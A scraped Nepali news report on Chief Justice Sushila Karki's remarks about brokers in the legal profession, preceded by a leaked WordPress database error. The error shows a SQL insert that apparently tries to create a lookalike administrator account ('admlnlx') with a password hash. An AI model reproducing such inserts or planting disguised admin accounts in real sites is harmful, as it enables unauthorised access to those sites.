WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BxDrGIihIulJ6g07GkPmI3/cbq79WD1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-08 18:15:42', '', 'admlnlx', 'admlnlx')
वीरगन्ज, मंसिर २५–
प्रधानन्यायधीश सुशीला कार्कीले वकालत पेशामा माफियातन्त्र हाबी भएको बताएकी छन् ।६८ औं अन्तराष्ट्रिय मानवअधिकार दिवसको अवसरमा नेपाल बार एशोसियसनले वीरगन्जमा आज आयोजना गरेको मानव अधिकार सम्बन्धि राष्ट्रिय गोष्ठीको उदघाटन गर्दै प्रधानन्याधिशकार्कीले यस्तो यस्तो बताएकी हुन् ।
बिचौलीयाहरुको बिगबिगीले कानून व्यवसायीको गरिमा खस्कदै गएको भन्दै प्रधानन्यायधिश कार्कीले आफनो पेशाको गरिमा कायम राख्न कानून व्यवसायीहरु आग्रह पनि गरिन् ।सर्वोच्च अदालतको न्याधिश नियुक्तको प्रसंगमा प्रधानन्याधिश कार्कीले सक्षम र योग्य व्याक्ति नै न्याधिश नियुक्त हुनेमा आफु विश्वस्त रहेको बताइन् ।